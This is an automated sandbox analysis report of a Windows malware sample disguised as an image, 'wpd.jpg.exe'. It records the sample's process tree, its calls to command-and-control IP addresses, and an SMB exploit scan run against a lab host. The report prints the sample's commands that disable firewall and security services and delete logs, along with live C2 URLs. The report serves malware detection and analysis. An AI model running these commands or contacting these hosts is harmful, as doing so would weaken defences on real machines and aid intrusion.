Summary

Category	Machine	Started	Completed
ARCHIVE	s1_win7_x6402	June 7, 2024, 5:48 p.m.	June 7, 2024, 5:50 p.m.

Archive wpd.jpg.exe @ sandbox.zip

Size	8.4MB
Type	PE32 executable (console) Intel 80386, for MS Windows
MD5	`1bfe19a314dd31d6adda302f177c3b7c`
SHA1	`37fd59aa2c2b77c8757438075138f11eaedf81b8`
SHA256	`b63ce450e4d34d1cdd727a1a246d38167f45aeacc69d15c6922ef723e49a3cf7`
SHA512	`b486b312f809146fbe95f121ea9d7bfc152266e5ca1a178316aafe4ca21e4a80ffa76b5c7e36758d45714439b34f7f6fa6d3ed2a599f64fd7dfe5a23d416a638`
CRC32	`CD831527`
ssdeep	`196608:1M6/uTeIz//QEJZe+t6SuqYTFLQmEe2r06+mVWFO5p5adyuFqAHBLgMP:l/YeIzAYe+t1uTJQddQ3Qub`
Yara	Network_Downloader - File Downloader PE_Header_Zero - PE File Signature IsPE32 - (no description)

wpd.jpg.exe "C:\Users\test22\AppData\Local\Temp\wpd.jpg.exe"
2144
- cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto
  2228
  - taskkill.exe taskkill /f /im csrs.exe
    196
  - sc.exe sc start netprofm
    1688
  - sc.exe sc config netprofm start= auto
    1196
  - sc.exe sc start NlaSvc
    1728
  - sc.exe sc config NlaSvc start= auto
    2516
- cmd.exe C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log
  1060
  - net.exe net stop WinNsaSrv
    2836
    - net1.exe C:\Windows\system32\net1 stop WinNsaSrv
      2868
  - sc.exe sc config WinNsaSrv start= disabled
    2204
  - sc.exe sc stop 1MpsSvc
    292
  - sc.exe sc config 1MpsSvc start= disabled
    2804
- cmd.exe C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f
  3604
  - taskkill.exe taskkill /im csrs.exe /f
    3652
- csrs.exe csrs.exe -m 6 -t 200 -l 9999
  3776
  - csrs.exe csrs.exe -m 6 -t 200 -l 9999
    3820

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
104.37.187.182	Active	Moloch
139.5.177.32	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49755 -> 192.168.57.21:1433	2001583	ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection	Misc activity
TCP 192.168.56.102:50113 -> 192.168.57.196:1433	2001583	ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection	Misc activity
TCP 192.168.56.102:50045 -> 192.168.57.127:445	2001569	ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW June 7, 2024, 5:48 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW June 7, 2024, 5:50 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (50 out of 243 events)

Time & API	Arguments	Status	Return
WriteConsoleA June 7, 2024, 5:48 p.m.	buffer: get url: 104.37.187.182 success console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: ERROR: The process "csrs.exe" not found. console_handle: 0x0000000b	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: [SC] StartService FAILED 1056: An instance of the service is already running. console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: [SC] ChangeServiceConfig SUCCESS console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: [SC] StartService FAILED 1056: An instance of the service is already running. console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: [SC] ChangeServiceConfig SUCCESS console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: 'sc1' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: The service name is invalid. console_handle: 0x0000000b	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: More help is available by typing NET HELPMSG 2185. console_handle: 0x0000000b	1	1
WriteConsoleW June 7, 2024, 5:48 p.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2024, 5:49 p.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2024, 5:49 p.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2024, 5:50 p.m.	buffer: ERROR: The process "csrs.exe" not found. console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:10,602 - DEBUG - console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:10,602 - INFO - ************** mode:6 addr: port:445 addrs: user: user file path: pwd: pwds: threads:200 cmd: batch file: listen port:9999 ************* console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:10,602 - INFO - parser user pwd dic... console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:10,602 - INFO - start attack... console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:10,618 - DEBUG - mixedAttack... console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: ecv total length: 4 console_handle: 0x00000007	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: ecv empty data,break! console_handle: 0x00000007	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,150 - INFO - blue attack target:192.168.56.102 console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,150 - INFO - check target:192.168.56.102 user: pwd: console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,227 - INFO - 192.168.56.102 OS:Windows 7 Professional N 7601 Service Pack 1 console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,243 - INFO - 192.168.56.102 is not patched console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,243 - INFO - spoolss: STATUS_ACCESS_DENIED console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,243 - INFO - samr: STATUS_ACCESS_DENIED console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,259 - INFO - netlogon: STATUS_ACCESS_DENIED console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,259 - INFO - lsarpc: STATUS_ACCESS_DENIED console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,259 - INFO - browser: STATUS_ACCESS_DENIED console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,275 - DEBUG - Target OS: Windows 7 Professional N 7601 Service Pack 1 console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,305 - DEBUG - SMB1 session setup allocate nonpaged pool success console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,322 - DEBUG - SMB1 session setup allocate nonpaged pool success console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,322 - DEBUG - good response status: INVALID_PARAMETER console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,322 - INFO - blueAttack is finished! console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,618 - INFO - exploit attack target:192.168.56.102 user: pwd: console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,618 - INFO - exploitrth:0 started! console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,650 - INFO - exploitrth:1 started! console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,650 - INFO - 192.168.56.102: Target OS: Windows 7 Professional N 7601 Service Pack 1 console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,664 - INFO - exploitrth:2 started! console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,680 - DEBUG - 192.168.56.102 Not found accessible named pipe console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,680 - INFO - Failure::exploit attack target:192.168.56.102 user: pwd: console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,680 - INFO - exploitrth:3 started! console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,680 - INFO - exploitrth:4 started! console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,680 - INFO - exploitrth:5 started! console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,680 - INFO - exploitrth:6 started! console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,680 - INFO - exploitrth:7 started! console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,680 - INFO - exploitrth:8 started! console_handle: 0x0000000b	1	1
WriteConsoleA June 7, 2024, 5:50 p.m.	buffer: 024-06-08 00:30:11,697 - INFO - exploitrth:9 started! console_handle: 0x0000000b	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 7, 2024, 5:50 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	xx0
section	xx1
section	xx2

The file contains an unknown PE resource name possibly indicative of a packer (2 events)

resource name	BIN
resource name	TXT

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ June 7, 2024, 5:48 p.m.	stacktrace: wpd+0xb87553 @ 0xf87553 0x246 exception.instruction_r: 90 57 9c bf ad ba ac e1 66 f7 d7 66 f7 d7 66 81 exception.symbol: wpd+0xa66c71 exception.instruction: nop exception.module: wpd.jpg.exe exception.exception_code: 0x80000004 exception.offset: 10906737 exception.address: 0xe66c71 registers.esp: 849776 registers.edi: 15459136 registers.eax: 3758760026 registers.ebp: 851808 registers.edx: 55 registers.ebx: 4194304 registers.esi: 0 registers.ecx: 838	1	0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Starts servers listening (5 events)

Time & API	Arguments	Status	Return
bind June 7, 2024, 5:48 p.m.	ip_address: 0.0.0.0 socket: 964 port: 0	1	0
bind June 7, 2024, 5:50 p.m.	ip_address: socket: 436 port: 0	1	0
bind June 7, 2024, 5:50 p.m.	ip_address: 0.0.0.0 socket: 496 port: 9999	1	0
listen June 7, 2024, 5:50 p.m.	socket: 496 backlog: 5	1	0
accept June 7, 2024, 5:50 p.m.	ip_address: 127.0.0.1 socket: 496 port: 49885	1	516

HTTP traffic contains suspicious features which may be indicative of malware related traffic (6 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://104.37.187.182/xpxmr.txt
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://104.37.187.182/ok/wpd.html
suspicious_features	Connection to IP address	suspicious_request	GET http://104.37.187.182/wpdmd5.txt
suspicious_features	Connection to IP address	suspicious_request	GET http://104.37.187.182/wpdtest.txt
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://104.37.187.182/ver.txt
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://104.37.187.182/shellver.txt

Performs some HTTP requests (6 events)

request	GET http://104.37.187.182/xpxmr.txt
request	GET http://104.37.187.182/ok/wpd.html
request	GET http://104.37.187.182/wpdmd5.txt
request	GET http://104.37.187.182/wpdtest.txt
request	GET http://104.37.187.182/ver.txt
request	GET http://104.37.187.182/shellver.txt

Allocates read-write-execute memory (usually to unpack itself) (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory June 7, 2024, 5:48 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01390000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0	0
NtAllocateVirtualMemory June 7, 2024, 5:50 p.m.	process_identifier: 3820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00590000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0	0

Foreign language identified in PE resource (15 events)

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

BIN

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e90a5c

size

0x0001e059

name

TXT

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00eaeab8

size

0x0008d49b

name

RT_STRING

language

LANG_CHINESE

filetype

empty

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00f3bf54

size

0x00000038

name

RT_VERSION

language

LANG_CHINESE

filetype

COM executable for DOS

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00e0c350

size

0x000002b8

Creates executable files on the filesystem (4 events)

file	C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcm90.dll
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcr90.dll
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcp90.dll
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\python27.dll

Creates a suspicious process (3 events)

cmdline	C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log
cmdline	C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f
cmdline	C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto

Drops an executable to the user AppData folder (24 events)

file	C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Util._counter.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Cipher._DES3.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\_hashlib.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\cryptography.hazmat.bindings._constant_time.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcr90.dll
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\_socket.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\select.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Hash._MD4.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\python27.dll
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcm90.dll
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcp90.dll
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\_ssl.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Cipher._DES.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\_cffi_backend.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Random.OSRNG.winrandom.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\pyexpat.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Util.strxor.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\cryptography.hazmat.bindings._openssl.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Cipher._AES.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Hash._SHA256.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Cipher._ARC4.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\bz2.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\_ctypes.pyd
file	C:\Users\test22\AppData\Local\Temp\_MEI37762\unicodedata.pyd

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "csrs.exe")

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 7, 2024, 5:48 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x01390000 process_handle: 0xffffffff	1	0	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0085f400', u'virtual_address': u'0x005ac000', u'entropy': 7.92303226230594, u'name': u'xx2', u'virtual_size': u'0x0085f2c0'}

entropy

7.92303226231

description

A section with a high entropy has been found

entropy

0.99953363647

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 7, 2024, 5:48 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW June 7, 2024, 5:50 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Potentially malicious URLs were found in the process memory dump (50 out of 1419 events)

url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/941.png
url	https://ssl.pstatic.net/static/pwe/common/img_use_mobile_version.png
url	https://s.pstatic.net/shopping.phinf/20211101_9/6565979b-3e08-4e3d-8514-b2a585c9e46e.jpg
url	http://uk.ask.com/favicon.ico
url	http://www.priceminister.com/
url	https://s.pstatic.net/static/www/mobile/edit/20210930/mobile_161522481722.png
url	http://175.208.134.150:8282/test/test.eml
url	https://s.pstatic.net/dthumb.phinf/?src=%22https%3A%2F%2Fs.pstatic.net%2Fstatic%2Fwww%2Fmobile%2Fedit%2F20211013_1095%2Fupload_1634111386163GV3Vc.JPEG%22
url	http://es.wikipedia.org/
url	https://www.semicolonworld.com/public/js/cookiealert.js
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/477.png
url	http://blogimgs.naver.net/nblog/mylog/post/btn_cancel.gif
url	https://www.semicolonworld.com/public/editor/styles/simditor.css
url	http://busqueda.aol.com.mx/
url	http://blogimgs.naver.net/nblog/guestbook/btn_close2.gif
url	https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
url	http://recherche.linternaute.com/
url	https://s.pstatic.net/static/newsstand/up/2017/1122/nsd113655834.png
url	http://www.yceml.net/0559/10408495-1499411010011
url	https://ssl.pstatic.net/tveta/libs/1364/1364526/a5068a6f44555ea499da_20211029164146193.jpg
url	https://tistory3.daumcdn.net/tistory/807805/skin/images/logo_tistory.gif
url	http://busca.orange.es/
url	http://ja.wikipedia.org/favicon.ico
url	https://siape.veta.naver.com/fxshow?su=SU10599
url	https://s.pstatic.net/shopping.phinf/20211013_2/ee5c113b-bfae-4cf3-81e3-2ba12403fc6d.jpg
url	https://ssl.pstatic.net/static/pwe/nm/b.gif
url	http://search.nifty.com/
url	https://castbox.shopping.naver.com/js/lazyload.js
url	https://ssl.pstatic.net/tveta/libs/1339/1339221/f1a87c541e410a8250af_20211006100906815.jpg
url	http://ns.adobe.com/exif/1.0/
url	https://s.pstatic.net/shopping.phinf/20200729_1/2931dd60-1842-4048-a39c-1e3389db4a0e.jpg
url	https://ssl.pstatic.net/static/pwe/nm/spr_vertical_0d25bb77f8.png
url	http://www.google.com.sa/
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/361.png
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/042.png
url	https://s.pstatic.net/dthumb.phinf/?src=%22https%3A%2F%2Fs.pstatic.net%2Fstatic%2Fwww%2Fmobile%2Fedit%2F20211012_1095%2Fupload_1634015607233BeFLd.JPEG%22
url	http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/056.png
url	http://www.buzzadnetwork.com/jump/next.php?stamat=m%7CM-4iM-4jaQdHQBH0dEdHP3xP.0e7%2CboDB7XrVJDfRqYwVNhmAc8QRCrIuseXl_bWuTf_latOFYiGEzPpb7ikp5t8RPmTHyMRYDe1i9EJZLC6LSuccW1-YPggnMxkcwVirdNVGfgK3hFUbeKvFvqNv0-u8VxfrNUFB1gFhMN_8GLCn1znxf5_p0FJe0MYRI7nbfyajoqg_H3fvzrjsMsC0vAMYn2un8v5vcBfzwM-DewoZ7WId7geGlrySfAHx5KiJ5Hm90CU%2C
url	http://fr.wikipedia.org/favicon.ico
url	https://t1.daumcdn.net/tistory_admin/blogs/plugins/PreventCopyContents/js/functions.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336
url	https://www.semicolonworld.com/public/editor/scripts/page-demo.js
url	http://www.amazon.com/favicon.ico
url	https://s.pstatic.net/dthumb.phinf/?src=%22https%3A%2F%2Fs.pstatic.net%2Fstatic%2Fwww%2Fmobile%2Fedit%2F20211029_1095%2Fupload_1635469564183PpB2J.jpg%22
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/038.png
url	http://search.chol.com/favicon.ico
url	https://ssl.pstatic.net/static/pwe/address/deskhome/spr_cp_loading.png
url	http://purl.org/rss/1.0/
url	http://www.google.es/
url	https://www.google.com/pagead/drt/ui

Yara rule detected in process memory (50 out of 533 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl

Uses Windows utilities for basic Windows functionality (13 events)

cmdline	sc start NlaSvc
cmdline	C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log
cmdline	sc config NlaSvc start= auto
cmdline	sc start netprofm
cmdline	sc stop 1MpsSvc
cmdline	C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f
cmdline	taskkill /im csrs.exe /f
cmdline	taskkill /f /im csrs.exe
cmdline	sc config 1MpsSvc start= disabled
cmdline	sc config netprofm start= auto
cmdline	sc config WinNsaSrv start= disabled
cmdline	net stop WinNsaSrv
cmdline	C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto

Communicates with host for which no DNS query was performed (2 events)

host	104.37.187.182
host	139.5.177.32

A process attempted to delay the analysis task. (2 events)

description	wpd.jpg.exe tried to sleep 197 seconds, actually delayed analysis time by 197 seconds
description	csrs.exe tried to sleep 1741 seconds, actually delayed analysis time by 1741 seconds

Found URLs in memory pointing to an IP address rather than a domain (potentially indicative of Command & Control traffic) (11 events)

url	http://175.208.134.150:8282/test/test.eml
url	http://104.37.187.182/ok/wpd.html
url	http://175.208.134.150:8282/favicon.ico
url	http://123.123.123.123
url	http://192.168.3.119/
url	http://104.37.187.182/wpdmd5.txt
url	http://123.123.123.123:54321/dlr.arm
url	https://192.168.3.119/
url	http://139.5.177.32:9999/
url	http://185.47.128.124:8124/m17010.txt
url	http://139.5.177.32:9999

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (7 events)

dead_host	139.5.177.32:9999
dead_host	192.168.56.102:49279
dead_host	192.168.56.103:445
dead_host	192.168.56.1:1433
dead_host	192.168.56.1:445
dead_host	192.168.56.102:49229
dead_host	192.168.56.103:1433

Archive wpd.jpg.exe @ sandbox.zip

Summary

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All